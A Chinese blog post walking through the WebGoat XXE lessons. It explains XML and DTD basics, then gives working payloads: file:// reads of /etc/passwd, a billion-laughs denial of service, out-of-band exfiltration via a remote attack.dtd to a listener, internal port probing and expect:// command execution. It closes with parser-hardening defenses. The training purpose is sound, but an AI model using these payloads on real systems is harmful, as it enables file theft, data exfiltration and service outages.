Webgoat --XEE

最新推荐文章于 2024-05-29 07:48:21 发布
原创 最新推荐文章于 2024-05-29 07:48:21 发布 · 638 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文介绍了XML的基本概念,如DTD、XSL和XLL,强调了XML用于传输和存储数据的特性。接着,文章详细讨论了XML外部实体注入(XXE)的原理和危害,包括攻击方式如获取服务器文件、执行系统命令和探测内网。还提到了常见的0X04、0X07和0x11等XXE漏洞利用场景。最后,文章提出了防御XXE的方法,如禁用DTD和外部实体,以及过滤特定提交数据。

基础知识

  • XMl定义
    XML由3个部分构成,它们分别是:
    文档类型定义(Document Type Definition,DTD),即XML的布局语言;
    可扩展的样式语言(Extensible Style Language,XSL),即XML的样式表语言;
    可扩展链接语言(Extensible Link Language,XLL)。
    XML:可扩展标记语言,是一种用于标记电子文件使其具有结构性的标记语言。
    可扩展标记语言(XML)和超文本标记语言(HTML)为不同的目的而设计
    XML被设计用来传输和存储数据,其焦点是数据的内容
    HTML被设计用来显示数据,其焦点是数据的外观
  • XML的作用
    XML使用元素和属性来描述数 据。在数据传送过程中,XML始终保留了诸如父/子关系这样的数据结构。几个应用程序 可以共享和解析同一个XML文件,不必使用传统的字符串解析或拆解过程。
  • 引用外部DTD
<!DOCTYPE 根元素 SYSTEM "文件名">#SYSTEM标识符意味着该实体将从外部来源获取内容,调用外部资源,而这里是支持很多的协议,如:http;file等
<!DOCTYPE 根元素 PUBLIC "public_ID" "文件名">

外部实体类型有
在这里插入图片描述

  • CDATA
    CDATA 指的是不应由 XML 解析器进行解析的文本数据(Unparsed Character Data)
    在 XML 元素中,"<" (新元素的开始)和 “&” (字符实体的开始)是非法的。
    某些文本,比如 JavaScript 代码,包含大量 “<” 或 “&” 字符。为了避免错误,可以将脚本代码定义为 CDATA。
    CDATA 部分中的所有内容都会被解析器忽略。
    CDATA 部分由 “<![CDATA[" 开始,由 "]]>” 结束

  • xml的实体–参数实体
    只有在DTD中才能引用参数实体
    该类型的实体用“%”字符(或十六进制编码的%)声明,并且仅在经过解析和验证后才用于替换DTD中的文本或其他内容

<!ENTITY 实体名称 "实体的值">
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % param1 "<!ENTITY internal 'http://evil.com'>">
%param1;
]>
<root>
<test>[This is my site] &internal;</test>
</root>
#先执行%param1; 再执行 &internal;

参数实体在DTD中解析优先级高于xml内部实体
参数实体特性
1)只能在DTD内部
2)立即引用
3)实体嵌套

<?xml version="1.0" encoding="UTF-8"?>  //XML 声明
<!DOCTYPE user [					    //XML文档定义 DTD
  <!ELEMENT user(name,age) >	
  <!ELEMENT name (#PCDATA)>		       //XML 约束
  <!ELEMENT age (#PCDATA)>		       
  <!ENTITY name "Jo Smith">			   //XML实体
  <!ELEMENT age "20" >		       
]>
<user>								//XML文档
  <name>&name;</name>				//xml 实体引用
  <age>&age;</age>
</user>

  • XEE
    XML外部实体注入。通过 XML 实体,”SYSTEM”关键词导致 XML 解析器可以从本地文件或者远程 URI 中读取数据。所以攻击者可以通过 XML 实体传递自己构造的恶意值,是处理程序解析它。当引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

  • 攻击方式
    SYSTEM 获取服务器目录或文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE author [
  <!ENTITY js SYSTEM "file:///etc/passwd">
]>
<author>&js;</author>

更改内容类型绕过

Content-Type: application/xml			#更改内容类型
<?xml version="1.0" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>

拒绝服务攻击

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

盲注–在数据无回显时可以使用盲注方式将数据发送到远程攻击服务器
通过在执行自己的服务器上外部XML,判断是否执行了XEE
可使用该网站接受信息 http://ceye.io/payloads

#本地服务器保存 名为attack.dtd 的XML文件
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY ping SYSTEM 'http://192.168.80.2:9090/landing'>

#修改提交XML表单
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://192.168.80.2:9090/WebWolf/files/attack.dtd">
%remote;
]>
<comment>
  <text>test&ping;</text>
</comment>

探测内网地址

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "http://192.168.0.100:80">]> #探测80是否开放
<root>
<name>&xxe;</name>
</root>
#在安装expect扩展的PHP环境里执行系统命令,其他协议也有可能可以执行系统命令
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "expect://ifconfig" >]>
<root>
<name>&xxe;</name>
</root>
#这里读取系统命令ifconfig读取ip

基于错误的XXE注入

#本地服务器保存 名为attack.dtd 的XML文件
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY %file SYSTEM 'file:///etc/passwd'>
<!ENTITY %print "<!ENTITY send SYSTEM 'http://vulSite/login1.php?name=%file;'>">
#提交错误URI
%print;

#修改提交XML表单
<?xml version="1.0"?>
<!DOCTYPE remote SYSTEM "http://192.168.80.2:9090/WebWolf/files/attack.dtd">
<comment>
  <text>&send;</text>
</comment>

0X04

<?xml version="1.0"?>
<!DOCTYPE comment [<!ENTITY js SYSTEM "file:///">]>
<comment>  <text>&js;</text></comment>

0X07

POST /WebGoat/xxe/content-type HTTP/1.1
Host: 192.168.80.2:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.2:8080/WebGoat/start.mvc
Content-Type: application/xml			#更改内容类型
X-Requested-With: XMLHttpRequest
Content-Length: 111
Connection: close
Cookie: JSESSIONID=0_-c6R_tWhZZx_1BDBiIpyxlcevotPdZ7ixfAYq7


<?xml version="1.0" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>

0x11

#保存为a.dtd 上传webwolf上
<!ENTITY % a  "<!ENTITY attack SYSTEM 'http://127.0.0.1:9090/landing?text=%file;'>">
#更改提交的表单内容
<?xml version="1.0"?>
<!DOCTYPE comment [
<!ENTITY % file SYSTEM "file:///home/webgoat/.webgoat-8.1.0//XXE/secret.txt">
<!ENTITY % remote SYSTEM "http://192.168.80.2:9090/files/passaa/a.dtd">
%remote;
%a;
]>
<comment><text>&pass;</text></comment>

在这里插入图片描述
url解码得到 WebGoat 8.0 rocks… (CEsixJDQUy) 提交结果

防御方法

  • 设置XML解析器禁用DTD
XMLInputFactory xif = XMLInputFactory.newFactory();
xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
  • 设置XML解析器禁用外部实体
#.PHP:
libxml_disable_entity_loader(true);
#.JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
#.Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
  • 对http头中content-type及accept进行验证
Content-Type: application/xml
  • 过滤提交数据中的<!DOCTPE和<!ENTITY

DTD语法
https://www.cnblogs.com/lm970585581/p/7699555.html
XML、XEE基础知识
https://www.cnblogs.com/backlion/p/9302528.html

WebGoat教程解析
05-09
WebGoat里面关于会话劫持(Hijack a Session)这个课程的标准答案里面除了使用WebScarab以外还使用了其他的工具来找出合法的SessionID以完成这个课程,实际上这个课程完全可以只使用WebScarab来完成。
WebGoat (A4) XML External Entities (XXE)
箭雨镜屋
03-15 2981
第4页 这题要求用XXE注入罗列系统根目录。 首先在上图的输入框输入个评论,比如cute,按submit提交。 到burpsuite的proxy模块找到相关request报文,鼠标右键--send to repeater 从上图可见,<text></text>标签之前的内容是会显示在评论区的,因此如果在此处引用外部实体,外部实体的内容也是可以显示在评论区的。 在request报文中的xml代码中增加DTD,并在其中定义外部实体root,其内容是"file:///",
WebGoat8 M17 XXE 全思路、题解与答案
伊维泽诺流浪记
02-27 2631
目录 01 什么是XML语言 02 实体、外部实体 03 什么是XXE 04 XXE问题3 ★ 05 XXE问题4 ★ 06 参数实体 07 XXE问题7 ★ 01 什么是XML语言 XML(EXtensible Markup Language),可扩展标记语言,是一种用于标记电子文件,使其具有结构性的标记语言,可以用来标记数据,定义数据类型。与HTML不同:HTML被设计...
WebGoat 8.0 XXE注入 解题思路
Abracadabra的专栏
09-20 4664
WebGoat 8.0 XXE注入 解题思路 ★ 题目 地址: http://127.0.0.1:8080/WebGoat/start.mvc#lesson/XXE.lesson/2 ★ XXE 注入攻击是什么 XXE 是 XML External Entity的缩写。 XXE注入攻击,发生在一些配置较弱的XML解析器中。XXE攻击可以导致隐私数据泄露、拒绝服务、服务端请求伪造、端口扫描等问题。...
webgoat- XML External Entity-XXE-XML实体注入
seanyang_的博客
11-01 1779
XML 外部实体攻击是针对解析 XML 输入的应用程序的一种攻击。当包含对外部实体的引用的 XML 输入由配置较弱的 XML 解析器处理时,就会发生此攻击。这种攻击可能会导致机密数据泄露、拒绝服务、服务器端请求伪造、从解析器所在机器的角度进行端口扫描以及其他系统影响。攻击可能包括使用 file: 方案或系统标识符中的相对路径来泄露本地文件,其中可能包含密码或私人用户数据等敏感数据。
WebGoat攻略 for Mac(4)
qq_42955000的博客
04-19 496
WebGoat攻略 for Mac(1) WebGoat攻略 for Mac(4)一、题目攻略A3.Sensitive Data Exposure(敏感数据暴露)1.Insecure Login(不安全登录)A4. XML External Entities (XXE)(XML外部实体)1.XXE 一、题目攻略 A3.Sensitive Data Exposure(敏感数据暴露) 1.Insecure Login(不安全登录) 让我们试试 任务是尝试使用数据包嗅探器拦截请求。 点击Log in,然后抓
Java代码审计安全篇-XXE(XML外部实体注入)漏洞
dzqxwzoe的博客
05-29 1652
XML 实体允许定义标记,在分析 XML 文档时,这些标记将被内容替换。通常有三种类型的实体:内部实体外部实体参数实体。必须在文档类型定义 (DTD) 中创建一个实体,让我们从一个示例开始:正如你所看到的,一旦XML文档被解析器处理,它就会用定义的常量“JoSmith”替换定义的实体。正如你所看到的,这有很多优点,因为你可以在一个地方更改为例如“约翰史密斯”。js ``js在 Java 应用程序中,XML 可用于将数据从客户端获取到服务器,我们都熟悉 JSON API,我们也可以使用 xml
webgoat靶场复现
WEB渗透测试 从入门到萌新
10-22 603
这是暴力破解的密钥。因此,我们可以使用 JWT 库自己编写脚本,也可以使用 github 上提供的脚本。这个python拆除脚本是基于字典的,所以首先你必须有一个强大的字典。我的字典不够强大,不足以让我几次不拆除,所以我只是去源头并翻出一些秘密密钥添加到我的字典中,解码 jwt-token,然后将 admin 修改为 true 并使用以下脚本重新编码标头和有效负载,不添加签名部分,发送请求。参考:https://www.freebuf.com/vuls/216457.html。解密打不开 以后在做。
1006.Web安全攻防靶场之WebGoat – 2
weixin_30896511的博客
01-15 522
概述 由于上一篇文章 Web安全攻防靶场之WebGoat - 1 过长,这里分开写后面内容 使用 Cross-Site Scripting (XSS) 跨站脚本攻击,跨站脚本分为三类 1. Reflected XSS Injection 反射型xss 通过一个链接产生的xss叫做反射型xss,所有恶意内容都在url中。 2. Stored XSS Injection 存...
XXE攻击学习
weixin_30897233的博客
12-27 87
环境:lAMP simplexml_load_string.php代码内容 <?php $data = file_get_contents('php://input'); $xml = simplexml_load_string($data); echo $xml->name; ?> POC: <?xml version="1.0" ...
WebGoat通关攻略
weixin_45539802的博客
01-06 3万+
WebGoat通关攻略 目录WebGoat通关攻略前言一、环境配置1.Docker配置2.WebGoat获取3.WebGoat连接二、通关攻略(建设中)1.Introduction2.General3.Injection4.Broken Authentication5.Sensitive Data Exposure6.XML External Entities(XXE)7.Broken Access Control8.Cross-Site Scripting(XSS)9.Insecure Deseriali
WebGoat靶场搭建及通关记录(一)
m0re's blog
08-26 8204
文章目录前言一、搭建靶场二、通关攻略1.GeneralHTTP BasicsHTTP Proxies2.Injection FlawsSQL Injection (advanced) 前言 搭建WebGoat靶场,没事打一打。 一、搭建靶场 靶场环境,只介绍在windows系统中搭建过程。 先下载这两个文件 https://github.com/WebGoat/WebGoat/releases/download/v8.1.0/webgoat-server-8.1.0.jar https://githu
Java代码审计——WebGoat XML外部实体注入(XXE)
m0_61506558的博客
11-16 1013
在进行代码分析之前,要先懂漏洞产生的原理,不妨看看这篇文章,WebGoat上面描述的也不错,值得研读。
WebGoatV8.1(A3-A5)详细过关教程
weixin_51566481的博客
08-29 2341
webgoat
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
Web安全--XXE
lanyef的专栏
10-12 1009
0x01 简介 顺手搜了一下CVE,XXE的问题还真不少。 XXE,XML External Entity (外部实体)。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。它使用一系列的合法元素来定义文档结构。 一般实体(General Entities) 可在xml中进行引用,&js; <?xml version="1.0" stand...
webgoat全关教程手册
热门推荐
黑白的博客
11-08 6万+
Webgoat&Webwolf owaspbwa里面的两个服务 搭建 先要安装jdk、Webgoat和Webwolf Webgoat和Webwolf jdk1.8不支持了,需要安装jdk11 去git上下载Webgoat和Webwolf https://github.com/WebGoat/WebGoat/releases/tag/v8.0.0.M26 去oracle官网下载JDK https://www.oracle.com/java/technologies/javase-jdk11-down
学习Web应用漏洞最好的教程----WebGoat
03-19 2万+
    WebGoat是一个用于讲解典型web漏洞的基于J2EE架构的web应用,他由著名的WEB应用安全研究组织OWASP精心设计并不断更新,目前的版本已经到了5.0。WebGoat本身是一系列教程,其中设计了大量的web缺陷,一步步的指导用户如何去利用这些漏洞进行攻击,同时也指出了如何在程序设计和编码时避免这些漏洞。Web应用程序的设计者和测试者都可以在WebGoat中找到自己感兴趣的部分。 
XXE漏洞笔记
公众号shadow sock7
06-30 3061
参考: http://wooyun.jozxing.cc/static/bugs/wooyun-2014-059911.html http://bobao.360.cn/learning/detail/3841.html http://blog.csdn.net/u011721501/article/details/43775691 http://thief.one/2017/06/20/1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值